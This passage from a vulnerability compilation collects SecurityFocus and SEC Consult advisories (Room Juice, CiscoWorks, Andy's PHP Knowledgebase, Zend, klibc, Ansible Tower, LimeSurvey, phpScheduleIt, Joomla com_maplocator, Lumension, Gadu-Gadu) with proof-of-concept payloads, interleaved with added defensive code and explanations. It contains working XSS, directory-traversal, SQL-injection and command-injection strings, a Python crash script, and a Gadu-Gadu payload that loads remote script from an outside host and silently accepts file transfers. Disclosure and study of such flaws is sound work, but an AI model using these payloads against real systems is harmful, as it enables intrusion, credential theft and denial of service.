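    if declared_type.split(";")[0].strip().lower() != mime:
        return UploadDecision(False, "declared Content-Type disagrees with file body")

    return UploadDecision(True, "accepted", f"{stem}.{ext}")


def listing_label(name: str) -> str:
    """Name as it may be echoed into an 'Index of Documents' page.

    Applied to every displayed name, accepted or logged as rejected, so an
    injected <img src=...> such as the one in the Vulnerability Lab PoC renders
    as text instead of markup.
    """
    return html.escape(name, quote=True)
```

The upload directory itself still needs the web server configured not to execute anything stored in it, which no filename check can substitute for.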
  15. source: https://www.securityfocus.com/bid/47914/info

Room Juice is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Room Juice 0.3.3 is vulnerable; other versions may also be affected.

http://www.example.com/roomjuice-0.3.3/display.php?filename=%3Cscript%3Ealert%280%29%3C/script%3E
  16. source: https://www.securityfocus.com/bid/47905/info

CiscoWorks Common Services is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

A remote attacker could exploit this vulnerability using directory-traversal strings (such as '../') to gain access to arbitrary files on the targeted system. This may result in the disclosure of sensitive information or lead to a complete compromise of the affected computer.

This issue is being monitored by Cisco Bug ID CSCto35577.

CiscoWorks Common Services 3.3 and prior are vulnerable.

http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini

cmfDBA user database info:
http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties

DB connection info for all databases:
http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties

Note: When reading large files such as this file, ensure the row limit is adjusted to 500 for example.

DB password change log:
http://www.example.com/cwhp/auditLog.do?file=..\..\..\..\..\..\..\Program Files\CSCOpx\log\dbpwdChange.log
  17. source: https://www.securityfocus.com/bid/47918/info

Andy's PHP Knowledgebase is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.

Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.

Andy's PHP Knowledgebase 0.95.4 is vulnerable; other versions may also be affected.

<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/aphpkb/install/step5.php">
<input type="hidden" name="install_dbuser" value="');system('calc');//" />
<input type="submit" name="submit" />
</form>
</body>
</html>
  18. source: https://www.securityfocus.com/bid/47919/info

Zend Framework is prone to a security-bypass vulnerability.

An attacker can leverage this vulnerability to bypass certain security restrictions. Successful exploits may allow attackers to exploit SQL-injection vulnerabilities.

Zend Framework versions prior to 1.10.9 and 1.11.6 are vulnerable.

$dsn = 'mysql:dbname=INFORMATION_SCHEMA;host=127.0.0.1;charset=GBK';
$pdo = new PDO($dsn, $user, $pass);
$pdo->exec('SET NAMES GBK');
$string = chr(0xbf) . chr(0x27) . ' OR 1 = 1; /*';
$sql = "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ".$pdo->quote($string).";";
$stmt = $pdo->query($sql);
var_dump($stmt->rowCount());
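An added example, not part of the SecurityFocus entry and not Zend Framework or PDO code: a byte-level model of why an escaping routine that does not know the connection charset is GBK lets the `chr(0xbf) . chr(0x27)` prefix above close the string literal, next to a charset-aware escaper that does not, and a lexer model that reports where the literal ends. The GBK lead/trail byte ranges are the standard ones; the function names and the rule "consume a whole multibyte character first, otherwise a backslash skips one byte" are my simplified model of the server side.

```python
from typing import Callable, Optional

# GBK: a lead byte 0x81-0xFE followed by a trail byte 0x40-0xFE (0x7F excluded)
# forms one two-byte character. 0x5C ('\') is a valid trail byte; 0x27 (') is not.
def is_gbk_lead(b: int) -> bool:
    return 0x81 <= b <= 0xFE

def is_gbk_trail(b: int) -> bool:
    return 0x40 <= b <= 0xFE and b != 0x7F

def is_gbk_char(data: bytes, i: int) -> bool:
    """True if data[i:i+2] is a well-formed two-byte GBK character."""
    return i + 1 < len(data) and is_gbk_lead(data[i]) and is_gbk_trail(data[i + 1])

# Byte-level escapes in the MySQL style.
SPECIALS = {0x27: b"\\'", 0x22: b'\\"', 0x5C: b"\\\\", 0x00: b"\\0",
            0x0A: b"\\n", 0x0D: b"\\r", 0x1A: b"\\Z"}

def escape_bytewise(data: bytes) -> bytes:
    """Escaping that treats every byte on its own (a latin1-minded client)."""
    out = bytearray()
    for b in data:
        out += SPECIALS.get(b, bytes([b]))
    return bytes(out)

def escape_gbk_aware(data: bytes) -> bytes:
    """Escaping that walks GBK characters instead of bytes.

    A well-formed two-byte character is copied untouched. A lead byte that is
    NOT followed by a valid trail byte (the 0xBF 0x27 case) is itself escaped,
    so the backslash inserted before the following quote can never be swallowed
    as the trail byte of a freshly formed character.
    """
    out = bytearray()
    i = 0
    while i < len(data):
        if is_gbk_char(data, i):
            out += data[i:i + 2]
            i += 2
            continue
        b = data[i]
        if is_gbk_lead(b):
            out += b"\\" + bytes([b])
        else:
            out += SPECIALS.get(b, bytes([b]))
        i += 1
    return bytes(out)

def literal_end(escaped: bytes) -> Optional[int]:
    """Index at which a GBK-aware lexer closes the literal '<escaped>'.

    None means the literal is still open at the end (the intended outcome).
    Model: a whole multibyte character is consumed first; otherwise a backslash
    skips exactly one following byte; a bare quote terminates the literal.
    """
    i = 0
    while i < len(escaped):
        if is_gbk_char(escaped, i):
            i += 2
            continue
        b = escaped[i]
        if b == 0x5C:
            i += 2
            continue
        if b == 0x27:
            return i
        i += 1
    return None

def breaks_out(data: bytes, escaper: Callable[[bytes], bytes]) -> bool:
    """Does `data`, once escaped with `escaper`, terminate the literal early?"""
    return literal_end(escaper(data)) is not None

# Constructed sample: the advisory's input, and an ordinary apostrophe for contrast.
ADVISORY_INPUT = b"\xbf\x27 OR 1 = 1; /*"
ORDINARY_INPUT = b"O'Brien"
```

Byte-wise escaping turns `BF 27` into `BF 5C 27`; the lexer reads `BF 5C` as one character and the `27` that follows ends the string. The charset-aware variant emits `5C BF 5C 27`, which the same lexer reads as two escaped bytes.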
  19. source: https://www.securityfocus.com/bid/47924/info

klibc is prone to a shell-command-execution vulnerability because the application fails to properly sanitize user-supplied input.

An attacker can exploit this issue to execute arbitrary shell commands in the context of the application that uses the vulnerable library.

Versions prior to klibc 1.5.22 are vulnerable.

DNSDOMAIN="\\\"\$(echo owned; touch /tmp/owned)"
  20. SEC Consult Vulnerability Lab Security Advisory < 20150113-1 >
=======================================================================
              title: Privilege Escalation & XSS & Missing Authentication
            product: Ansible Tower
 vulnerable version: <=2.0.2
      fixed version: >=2.0.5
             impact: high
           homepage: http://www.ansible.com/tower
              found: 2014-10-15
                 by: Manuel Hofer
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Ansible Tower is the easy-to-use UI and dashboard and REST API for Ansible.
Centralize your Ansible infrastructure from a modern UI, featuring role-based
access control, job scheduling, and graphical inventory management. Tower's
REST API and CLI make it easy to embed Tower into existing tools and
processes. Tower now includes real-time output of playbook runs, an all-new
dashboard and expanded out-of-the-box cloud support."

source: http://www.ansible.com/tower


Business recommendation:
------------------------
Attackers are able to elevate privileges and gain full control over Ansible
Tower and therefore access to sensitive data of other customers.

It is assumed that further vulnerabilities exist as only a short crash test
has been performed. Therefore it is recommended to perform a thorough security
review by security professionals.


Vulnerability overview/description:
-----------------------------------
1) Privilege Escalation
Ansible Tower provides the feature to create multiple organizations inside
one tower instance. Each organization can have an unlimited number of users
and administrators which are only allowed to perform actions in the context
of their own organization. Due to missing validation of the "is_superuser"
parameter during user creation, organization admins can create superadmin
accounts and therefore elevate their privileges to gain full control of
Ansible Tower.

2) Reflected Cross-Site Scripting
Several parts of the Ansible Tower API have been identified to be vulnerable
against reflected XSS attacks which can be used by an attacker to steal user
sessions.

3) Missing Websocket Authentication / Information Leakage
The Ansible Tower UI uses Websockets to notify clients about recent events.
This part of the application lacks authentication as well as authorization,
leading to internal data about e.g. scheduled events, being leaked to
unauthorized and/or unauthenticated users.


Proof of concept:
-----------------
1) Privilege Escalation (Org-Admin to Superadmin)
Using the following request, a user with administrative privileges limited to
an organization, can create a superadmin account with access to all
organizations:

> POST /api/v1/organizations/3/users/ HTTP/1.1
> Host: $host
> Authorization: Token c3f03841403a17ed79753e057167a62144dae7df
> X-Auth-Token: Token c3f03841403a17ed79753e057167a62144dae7df
>
> {"first_name":"Org1admin_superuser","last_name":"Org1admin_superuser",
> "email":"Org1admin_superuser@local.local","organization":3,
> "username":"Org1admin_superuser","password":"Org1admin_superuser",
> "password_confirm":"Org1admin_superuser","is_superuser":"true","ldap_user":""}

2) Reflected Cross-Site Scripting
The following URL parameters have been identified to be vulnerable against
reflected cross-site scripting:

* URL: /api/v1/credentials/, Parameter: order_by
* URL: /api/v1/inventories/, Parameter: order_by
* URL: /api/v1/projects/, Parameter: order_by
* URL: /api/v1/schedules/, Parameter: next_run
* URL: /api/v1/users/3/permissions/, Parameter: order_by

It is likely that similar issues exist in other parts of the application.

3) Missing Websocket Authentication / Information Leakage
An attacker can set up a websocket connection without providing any
credentials as follows.

By issuing a GET request to "https://tower:8080/socket.io/1/" the server
responds with the following string:

> 43167469538:60:60:websocket,xhr-multipart,htmlfilonp-polling[...]

The first integer value can further be used to establish a websocket
connection:

#~% openssl s_client -verify 0 -connect tower:8080
> GET /socket.io/1/websocket/43167469538 HTTP/1.1
> Host: tower:8080
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Sec-WebSocket-Version: 13
> Origin: https://tower
> Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
> Connection: keep-alive, Upgrade
> Pragma: no-cache
> Cache-Control: no-cache
> Upgrade: websocket
>
>

The websocket key seen above has been taken from the examples of the wikipedia
page on WebSockets (http://de.wikipedia.org/wiki/WebSocket) as it is only used
to verify that the server received and understood the message.

The server responds as follows:

< HTTP/1.1 101 Switching Protocols
< Upgrade: websocket
< Connection: Upgrade
< Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=

Now that the websocket connection has been established, data that would
otherwise be presented to logged in users to display status updates for "job
related events" inside tower, can now be observed without any authentication.
The following is an example of data received through the websocket connection.

> 5::/socket.io/jobs:{"args":{"status":"pending","project_id":56,
> "unified_job_id":61,"event":"status_changed","endpoint":"/socket.io/jobs"},
> "name":"status_changed"}

Even though no critical information has been identified leaking through the
websocket, this should still be protected with proper authentication and
authorization because it might aid an attacker in conducting further attacks.


Vulnerable / tested versions:
-----------------------------
Ansible Tower version v2.0.2 has been tested which was the most recent version
at the time of discovery.


Vendor contact timeline:
------------------------
2014-10-22: Contacting vendor through security@ansible.com and asking for
            cryptographic material in order to securely send advisory.
2014-10-22: Sending unencrypted advisory as requested by vendor.
2014-10-22: Vendor suggests to release a fix prior to 12.12.2014
2014-10-28: Vendor confirms reported vulnerabilities
2014-12-10: Vendor releases fixed Version 2.0.5
2015-01-13: SEC Consult releases security advisory


Solution:
---------
Upgrade to a fixed version of Ansible Tower >= 2.0.5


Workaround:
-----------
For vulnerabilities 1 to 2, no workaround can be applied. 3 can be
circumvented by blocking access to TCP port 8080 on your Ansible Tower
installation.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com

EOF Manuel Hofer / 2015
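An added example for item 1 of the advisory above (my own code, not Ansible Tower's): the request-body filtering a user-creation endpoint needs so that an organization admin cannot set `is_superuser`. The field allowlists, the `Actor` type and the outcome labels are assumptions; the sample body is the advisory's PoC request, reused here as constructed test input.

```python
from dataclasses import dataclass, field
from typing import Any, Dict, Set


@dataclass
class Actor:
    """The authenticated caller of POST /api/v1/organizations/<id>/users/."""
    username: str
    is_superuser: bool = False
    admin_of_orgs: Set[int] = field(default_factory=set)


# Fields an organization admin may supply when creating a user in an
# organization they administer (the non-privileged fields of the PoC body).
ORG_ADMIN_WRITABLE = {
    "first_name", "last_name", "email", "username",
    "password", "password_confirm", "ldap_user",
}
# Fields that grant global privilege: only an existing superuser may set them.
PRIVILEGED_FIELDS = {"is_superuser"}


class Forbidden(Exception):
    """Caller tried to act beyond their role (worth an audit-log entry)."""


class BadRequest(Exception):
    """Malformed or unknown input."""


def _as_bool(value: Any) -> bool:
    # The PoC sends "is_superuser":"true" as a string. Never rely on Python
    # truthiness here: the string "false" would be truthy as well.
    if isinstance(value, bool):
        return value
    if isinstance(value, str) and value.lower() in ("true", "false"):
        return value.lower() == "true"
    raise BadRequest("is_superuser must be a boolean")


def sanitize_user_creation(actor: Actor, org_id: int, body: Dict[str, Any]) -> Dict[str, Any]:
    """Return the fields of `body` that `actor` may persist for a new user in `org_id`.

    The organization is taken from the URL, never from the body; privileged
    fields are refused outright for non-superusers instead of being silently
    dropped, so the attempt is visible; and is_superuser defaults to False.
    """
    if not (actor.is_superuser or org_id in actor.admin_of_orgs):
        raise Forbidden(f"{actor.username} does not administer organization {org_id}")

    requested = set(body) - {"organization"}  # URL wins over body for the org
    privileged = requested & PRIVILEGED_FIELDS
    if privileged and not actor.is_superuser:
        raise Forbidden(f"{actor.username} may not set {sorted(privileged)}")

    unknown = requested - ORG_ADMIN_WRITABLE - PRIVILEGED_FIELDS
    if unknown:
        raise BadRequest(f"unknown fields: {sorted(unknown)}")

    clean = {k: body[k] for k in requested & ORG_ADMIN_WRITABLE}
    clean["organization"] = org_id
    clean["is_superuser"] = _as_bool(body["is_superuser"]) if privileged else False
    return clean


def attempt(actor: Actor, org_id: int, body: Dict[str, Any]) -> str:
    """Outcome label for one creation request; convenient for tests and logging."""
    try:
        clean = sanitize_user_creation(actor, org_id, body)
    except Forbidden:
        return "forbidden"
    except BadRequest:
        return "bad_request"
    return "superuser_created" if clean["is_superuser"] else "user_created"


# Constructed sample: the body from the advisory's PoC, as sent by an admin of org 3.
POC_BODY = {
    "first_name": "Org1admin_superuser", "last_name": "Org1admin_superuser",
    "email": "Org1admin_superuser@local.local", "organization": 3,
    "username": "Org1admin_superuser", "password": "Org1admin_superuser",
    "password_confirm": "Org1admin_superuser", "is_superuser": "true", "ldap_user": "",
}
ORG_ADMIN = Actor("org1admin", admin_of_orgs={3})
SUPERUSER = Actor("root", is_superuser=True)
```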
  21. source: https://www.securityfocus.com/bid/47931/info

LimeSurvey is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

LimeSurvey 1.85+ is vulnerable; other versions may also be affected.

POST /admin/admin.php HTTP/1.1
Content-Length: 110
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.mspowerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://xxx.xxx.xxx.xxx/admin/admin.php
Accept-Language: es-AR
Content-Type: application/x-www-form-urlencoded
Host: xxx.xxx.xxx.xxx
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)

user=admin&password=test&loginlang=default&action=login&refererargs="/><script >alert(document.cookie)</script>
  22. source: https://www.securityfocus.com/bid/47951/info

phpScheduleIt is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

phpScheduleIt 1.2.12 is vulnerable; other versions may also be affected.

http://www.example.com/forgot_pwd.php/[xss]
http://www.example.com/index.php/[xss]
http://www.example.com/register.php/[xss]
http://www.example.com/roschedule.php/[xss]
http://www.example.com/popCalendar.php?scheduleid=[xss]
23. source: https://www.securityfocus.com/bid/47941/info

The 'com_maplocator' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/index.php?option=com_maplocator&view=state&cid=null+AND+1=0+union+select+1,2,concat(username,0x3a,password)fl0rix,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users--
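The payload above is a textbook UNION injection: `null AND 1=0` empties the component's own result set, the `UNION SELECT` must list exactly as many columns as the original query (18 here, found by probing), and `concat(username,0x3a,password)` pulls `user:hash` pairs out of `jos_users` into one of the displayed columns. The following is an added example, not the component's code: it reproduces the pattern against an in-memory SQLite database with a constructed 3-column query and fake credentials, shows the column-count probe, and puts the parameterised query beside the string-built one. The payload is adapted for SQLite (`||` for `concat()`, `':'` for the `0x3a` literal, three columns instead of eighteen); MySQL syntax from the post would not parse here.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the Joomla database: a table the component queries
    and the jos_users table the payload pivots to. Credentials are fake."""
    con = sqlite3.connect(':memory:')
    con.executescript("""
        CREATE TABLE locations (id INTEGER, name TEXT, region TEXT);
        INSERT INTO locations VALUES (1, 'Alpha Office', 'north'), (2, 'Beta Office', 'south');
        CREATE TABLE jos_users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO jos_users VALUES (62, 'admin', 'fakehash$salt'),
                                     (63, 'editor', 'otherhash$salt');
    """)
    return con

def state_vulnerable(con, cid):
    """String-built query: the pattern the com_maplocator report describes."""
    sql = "SELECT id, name, region FROM locations WHERE id = " + str(cid)
    return con.execute(sql).fetchall()

def state_fixed(con, cid):
    """Bound parameter: cid is only ever a value to compare, never SQL text."""
    return con.execute("SELECT id, name, region FROM locations WHERE id = ?", (cid,)).fetchall()

def find_column_count(con, limit=32):
    """Why the original payload lists 18 columns: a UNION only works when both
    SELECTs have the same width, so the attacker probes NULL,NULL,... until the
    database stops complaining. Returns the width, or None if not found."""
    for n in range(1, limit + 1):
        probe = "null UNION SELECT " + ",".join(["NULL"] * n) + "--"
        try:
            state_vulnerable(con, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None

# Post 23's payload adapted to SQLite: '||' replaces concat(), ':' replaces the 0x3a
# hex literal, and the column list matches this 3-column query instead of 18.
PAYLOAD = "null AND 1=0 UNION SELECT 1, username || ':' || password, 3 FROM jos_users--"

def dump_credentials(con):
    """What the vulnerable endpoint leaks for PAYLOAD: one 'user:hash' string per row,
    surfaced in the column the page happens to display."""
    return sorted(row[1] for row in state_vulnerable(con, PAYLOAD))

if __name__ == '__main__':
    db = make_db()
    print('columns in the injectable query:', find_column_count(db))
    print('vulnerable handler returns:', dump_credentials(db))
    print('parameterised handler returns:', state_fixed(db, PAYLOAD))
```

The column-count probe is the step that explains the long `1,2,...,18` tail in the post; the `-- ` comment at the end discards whatever the component appends after `cid`.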
24. source: https://www.securityfocus.com/bid/47952/info

Lumension Security Lumension Device Control (formerly Sanctuary) is prone to a memory-corruption vulnerability.

An attacker can exploit this issue to cause a denial-of-service condition. Due to the nature of this issue, remote code execution is possible but has not been confirmed.

Lumension Device Control 4.4 SR6 is vulnerable; other versions may also be affected.

#!/usr/bin/env python3
import sys
from socket import socket, AF_INET, SOCK_STREAM

if len(sys.argv) != 2:
    print("\n--------------------------------------------------")
    print("Usage: %s <target IP>" % sys.argv[0])
    print("--------------------------------------------------\n")
    sys.exit(0)

host = sys.argv[1]
port = 65129

packet1  = b"\xec\x02\x00\x00"  # length of remaining packet (0x2ec = 748 bytes, which matches the data below)
packet1 += b"\xc9\x00\x00\x00"  # some kind of packet ID?
#packet1 += b"\x18\x00\x00\x00"
packet1 += b"\x61\x61\x61\x61"  # crash occurs here
packet1 += b"\xc8\x02\x00\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
packet1 += b"\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x01\x00"
packet1 += b"\x00\x00\x0d\xd8\x91\x32\x61\xf4\x43\xa1\xe1\x8e\x27\x68\x6d\xde"
packet1 += b"\xbe\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x95\x00\x05\x01"
packet1 += b"\x03\x00\x00\x03\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00"
packet1 += b"\x34\x2e\x34\x2e\x31\x34\x35\x32"  # client version ("4.4.1452")
packet1 += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet1 += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6\x5e"
packet1 += b"\xe0\x81\xdb\xd8\xcb\x01\xe4\x95\x45\xe1\xdb\xd8\xcb\x01\x7c\x99"
packet1 += b"\x47\xbc\xdb\xd8\xcb\x01\xd6\xbc\xb0\x34\xdc\xd8\xcb\x01\x02\x00"
packet1 += b"\x00\x00\x9c\x47\x57\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
packet1 += b"\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet1 += b"\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
packet1 += b"\xc0\xa8\x00\x6b"  # client IP address (192.168.0.107)
packet1 += b"\xff\xff\xff\x00"  # client subnet mask (255.255.255.0)
packet1 += b"\x61\x00\x63\x00\x65\x00\x72\x00\x2d\x00\x65\x00\x38\x00"
packet1 += b"\x31\x00\x37\x00\x66\x00\x61\x00\x65\x00\x30\x00\x64\x00\x38\x00"  # client hostname, UTF-16LE ("acer-e817fae0d8")
packet1 += b"\x00" * 480
packet1 += b"\x00\x00\x40\xfc\xba\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80"
packet1 += b"\x85\xcc\x23\x00\x00\x00\x80\xee\x36\x00\x93\x84\xde\x84\x02\x00"
packet1 += b"\x00\x00\x00\x00\x00\x00"

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(packet1)
print(s.recv(1024))
s.close()
25. source: https://www.securityfocus.com/bid/47957/info

Gadu-Gadu Instant Messenger is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

File name that loads external x.js code (autofocus fires the handler without any user interaction; the unescape()d string evaluates to x=document.getElementsByTagName('head').item(0);y=document.createElement('script');y.src='http://asd.pl/x.js';x.appendChild(y);):

<input onfocus="eval(unescape('x%3Ddocument.getElementsByTagName%28%27head%27%29.item%280%29%3By%3Ddocument.createElement%28%27script%27%29%3By.src%3D%27http:%2f%2fasd.pl%2fx.js%27%3Bx.appendChild%28y%29%3B'));this.setAttribute('onfocus',0);" autofocus>

Example x.js code to hide, accept and open every file request:

// hide the file-transfer entries so the victim never sees the prompt
document.getElementById('extra').innerHTML = '<style>.file, .entrySeparator{display:none;}</style>';
n = document.getElementById('open_file');
n.setAttribute('id', '');
// every second, synthesize a click on whatever "open_file" element has appeared since
function ff(){
  if(f = document.getElementById('open_file')) {
    e = document.createEvent("HTMLEvents");
    e.initEvent('click', true, true);
    f.dispatchEvent(e);
    f.setAttribute('id', '');
  }
  setTimeout('ff()', 1000);
}
ff();